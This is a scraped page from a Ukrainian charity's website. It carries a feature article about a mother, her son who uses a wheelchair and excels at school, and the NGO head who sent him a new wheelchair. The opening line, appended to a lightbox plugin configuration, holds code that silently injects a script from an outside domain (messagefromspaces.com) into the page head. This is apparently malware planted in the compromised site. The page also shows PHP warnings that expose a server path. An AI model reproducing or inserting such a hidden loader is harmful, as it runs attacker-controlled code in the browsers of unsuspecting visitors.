, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

МАМА НА ВСІ СТО!

МАМА НА ВСІ СТО!

Саме так називає Наталію Іванченко Світлана Винограденко, голова правління МГО «МОЗІРОН». Не захоплюватися Наталією – справді неможливо.

Років десять тому, коли Наталія з маленьким сином на руках, стукала в усі двері, просила допомоги для маленького Микити, відгукнулася саме вона – Світлана Винограденко.

– Світлана працювала викладачем на кафедрі фізкультури (нині Харківська державна зооветеринарна академія). Саме туди я прийшла шукати допомоги і саме вона звернула увагу на проблеми мого синочка. Саме Світлана зайнялася його реабілітацією після операції. Про знамениті валики Ляпка я лише чула від людей. А тут все стало доступним. Світлана Володимирівна зробила курс масажів Микиті і ми бачили як на очах дитина оживає! Вона творила чудеса. Після її переконань я стала впевненішою і міцнішою жінкою. Мабуть нічого випадковим не буває. Час від часу Світлана цікавилася нашим синочком. Дивувало: як ця красива і тендітна жінка стільки встигає, всього пам’ятає, не забуває… Ось і зараз ми розчулені до сліз – Світлана Винограденко потурбувалася про нас – «Нова пошта» доставляє нам візок для Микити.

Наталія Іванченко разом з чоловіком, Микитою й маленькою Софійкою живуть у приватному будинку в Дергачах на Харківщині. Так зручніше й корисніше для дітей. Дванадцятирічний Микита – дитина з особливими потребами (інвалід-спинальник) успішно й самостійно рухається в інвалідному візку по землі. Сьогодні Микита – п’ятикласник, відмінник у навчанні. На його рахунку вже кілька перемог – перше місце з математики на районній олімпіаді. А в третьому класі він став переможцем серед ровесників відомого конкурсу знавців української мови Петра Яцика. Його твори про маму і «Бал у Королеви Зими» не можна читати без сліз. Сьогодні Микита на індивідуальному навчанні, але вибудував свій графік так, що на деякі уроки приїздить до школи. У нього є справжній і вірний друг – Нікіта Закаблуков. Вони всюди разом. Це вселяє віру й надію.

– Треба багато пройти й пережити, щоб стати сильною жінкою – зізнається Наталія. А ще важливо, що поряд прекрасний чоловік – Людина, перевірена Богом. Ми навіть словами доповнюємо один одного. У нас думка одна.

Біля будинку у родини Іванченків 6 соток землі, багато хатньої роботи. Сумувати немає коли. Та й Наталія постійно працює. Вона обожнює свою роботу бухгалтера.

Наталія шкодує, що трохи запізно народилася Софійка, що у дітей відчутна різниця. Але . все ж – це чудово! Жінка радить народжувати без довготривалих перерв і не вагаючись. Ось вона, на жаль, мала сумнів. Та син переконав. Два роки уряд він писав листи Діду Морозу з одним проханням: «Хочу братика чи сестричку. Не хочу бути один у цьому житті!» Ось так мрії здійснюються. А ще Микита пам’ятає тьотю Свєту з Києва. Ще маленьким він переконливо її запитував: «Ти ж мій друг, правда?» а Світлана Винограденко – справжній і вірний друг. Вона ніколи й нічого не забуває. А свою любов підтверджує конкретними справами. Як ось і цього разу – інвалідний візок доставлено у Дергачі. А ще: не мало важливо отримати у відповідь «дякую». Мама ж Світлана іде по життю з девізом – «Роздай усім людям доброту!» Радіє, коли її добрі справи підтримують й відгукуються однодумці.

Як це важливо – мати справжнього і надійного друга, який завжди буде поруч.

Людмила ЧЕЧЕЛЬ

 

 

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2